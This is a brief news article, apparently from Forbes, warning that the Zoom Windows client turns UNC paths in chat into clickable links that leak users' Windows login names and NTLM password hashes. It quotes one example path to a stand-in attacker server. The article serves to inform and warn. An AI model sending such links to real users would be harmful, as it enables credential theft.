Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Today, news of a Zoom issue affecting Microsoft Windows users. The Zoom Windows client is at risk from a flaw in the chat feature that could allow attackers to steal the logins of people who click on a link, according to tech site Bleeping Computer.

When using Zoom, it’s possible for people to communicate with each other via text message in a chat interface. When a chat message is sent containing a URL, this is converted into a hyperlink that others can click on to open a webpage in their browser.

But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.

MORE FROM FORBESBeware Zoom Users: Here’s How People Can ‘Zoom-Bomb’ Your Chat

Ok, so what’s the problem?

Bleeping Computer demonstrated how regular URL and the UNC path of \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Source: Zoom User Warning: This Is How Attackers Could Steal Windows Passwords